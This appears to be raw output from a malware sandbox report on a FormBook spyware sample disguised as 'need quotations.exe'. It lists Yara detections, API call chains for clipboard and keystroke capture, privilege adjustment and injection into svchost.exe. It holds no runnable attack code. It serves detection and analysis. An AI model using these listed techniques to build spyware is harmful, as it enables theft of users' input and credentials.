Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00296B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00296B0C

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00296D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00296D07

Source: C:\Users\user\Desktop\need quotations.exe

0_2_00296B0C

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00282B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00282B37

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_002AF7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\need quotations.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00243D19
Source: need quotations.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: need quotations.exe, 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c81ccc0d-d
Source: need quotations.exe, 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: 'SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0e6e06a3-d
Source: need quotations.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c36f248d-f
Source: need quotations.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_261a7f1c-7

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: need quotations.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C8B3 NtClose,	1_2_0042C8B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B60 NtClose,LdrInitializeThunk,	1_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,	1_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674340 NtSetContextThread,	1_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674650 NtSuspendThread,	1_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BE0 NtQueryValueKey,	1_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BF0 NtAllocateVirtualMemory,	1_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BA0 NtEnumerateValueKey,	1_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B80 NtQueryInformationFile,	1_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AF0 NtWriteFile,	1_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AD0 NtReadFile,	1_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AB0 NtWaitForSingleObject,	1_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F60 NtCreateProcessEx,	1_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F30 NtCreateSection,	1_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FE0 NtCreateFile,	1_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FA0 NtQuerySection,	1_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FB0 NtResumeThread,	1_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F90 NtProtectVirtualMemory,	1_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E30 NtWriteVirtualMemory,	1_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EE0 NtQueueApcThread,	1_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EA0 NtAdjustPrivilegesToken,	1_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E80 NtReadVirtualMemory,	1_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D30 NtUnmapViewOfSection,	1_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D00 NtSetInformationFile,	1_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D10 NtMapViewOfSection,	1_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DD0 NtDelayExecution,	1_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DB0 NtEnumerateKey,	1_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C60 NtCreateKey,	1_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C00 NtQueryInformationProcess,	1_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CF0 NtOpenProcess,	1_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CC0 NtQueryVirtualMemory,	1_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CA0 NtQueryInformationToken,	1_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673010 NtOpenDirectoryObject,	1_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673090 NtSetValueKey,	1_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036739B0 NtGetContextThread,	1_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D70 NtOpenThread,	1_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D10 NtOpenProcessToken,	1_2_03673D10

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00286606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00286606

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0027ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0027ACC5

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002879D3

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026B043	0_2_0026B043
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00253200	0_2_00253200
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00253B70	0_2_00253B70
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027410F	0_2_0027410F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002602A4	0_2_002602A4
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0024E3B0	0_2_0024E3B0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027038E	0_2_0027038E
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027467F	0_2_0027467F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002606D9	0_2_002606D9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002AAACE	0_2_002AAACE
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00274BEF	0_2_00274BEF
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026CCC1	0_2_0026CCC1
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00246F07	0_2_00246F07
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0024AF50	0_2_0024AF50
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0025B11F	0_2_0025B11F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002A31BC	0_2_002A31BC
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026D1B9	0_2_0026D1B9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0026123A	0_2_0026123A
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027724D	0_2_0027724D
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002493F0	0_2_002493F0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002813CA	0_2_002813CA
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0025F563	0_2_0025F563
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002496C0	0_2_002496C0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028B6CC	0_2_0028B6CC
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002477B0	0_2_002477B0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002AF7FF	0_2_002AF7FF
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002779C9	0_2_002779C9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0025FA57	0_2_0025FA57
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00249B60	0_2_00249B60
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00247D19	0_2_00247D19
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0025FE6F	0_2_0025FE6F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00269ED0	0_2_00269ED0
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00247FA3	0_2_00247FA3
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0194A9E8	0_2_0194A9E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418773	1_2_00418773
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041696F	1_2_0041696F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416973	1_2_00416973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101C3	1_2_004101C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E1B3	1_2_0040E1B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004022FD	1_2_004022FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E2FE	1_2_0040E2FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402300	1_2_00402300
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E303	1_2_0040E303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402660	1_2_00402660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402E80	1_2_00402E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042EF33	1_2_0042EF33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FF9C	1_2_0040FF9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FFA3	1_2_0040FFA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037003E6	1_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C02C0	1_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630100	1_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F81CC	1_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F41A2	1_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037001AA	1_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664750	1_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C6E0	1_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03700591	1_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F2446	1_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E4420	1_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EE4F6	1_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FAB40	1_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F6BD7	1_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370A9A6	1_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364A840	1_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03642840	1_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E8F0	1_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036268B8	1_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4F40	1_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03682F28	1_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660F30	1_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E2F30	1_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632FC8	1_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BEFA0	1_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640E59	1_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEE26	1_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEEDB	1_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652E90	1_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FCE93	1_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364AD00	1_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DCD1F	1_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363ADE0	1_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03658DBF	1_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640C00	1_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630CF2	1_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0CB5	1_2_036E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D2F0	1_2_0365D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367516C	1_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B16B	1_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364B1B0	1_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F70E9	1_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF0E0	1_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF0CC	1_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF7B0	1_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03685630	1_2_03685630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC	1_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7571	1_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037095C3	1_2_037095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DD5B0	1_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631460	1_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF43F	1_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFB76	1_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B5BF0	1_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367DBF9	1_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FB80	1_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B3A6C	1_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFA49	1_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7A46	1_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EDAC6	1_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DDAAC	1_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03685AA0	1_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E1AA3	1_2_036E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649950	1_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B950	1_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D5910	1_2_036D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD800	1_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036438E0	1_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFF09	1_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03603FD2	1_2_03603FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03603FD5	1_2_03603FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFFB1	1_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641F92	1_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649EB0	1_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7D73	1_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643D40	1_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F1D5A	1_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FDC0	1_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B9C32	1_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFCF2	1_2_036FFCF2
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A5EE85	5_2_06A5EE85
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A5EE80	5_2_06A5EE80
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A674F5	5_2_06A674F5
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A674F1	5_2_06A674F1
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A65C65	5_2_06A65C65
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A5ED35	5_2_06A5ED35
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A60D45	5_2_06A60D45
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A7FAB5	5_2_06A7FAB5
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A692F5	5_2_06A692F5
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A60B25	5_2_06A60B25
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 5_2_06A60B1E	5_2_06A60B1E

Source: C:\Users\user\Desktop\need quotations.exe	Code function: String function: 0026F8A0 appears 35 times
Source: C:\Users\user\Desktop\need quotations.exe	Code function: String function: 00266AC0 appears 42 times
Source: C:\Users\user\Desktop\need quotations.exe	Code function: String function: 0025EC2F appears 68 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 107 times

Source: need quotations.exe, 00000000.00000003.1682161858.000000000424D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs need quotations.exe
Source: need quotations.exe, 00000000.00000003.1681632544.00000000040A3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs need quotations.exe

Source: need quotations.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/14

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0028CE7A GetLastError,FormatMessageW,

0_2_0028CE7A

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0027AB84
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0027B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0027B134

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0028E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0028E1FD

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00286532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00286532

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0029C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0029C18C

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0024406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

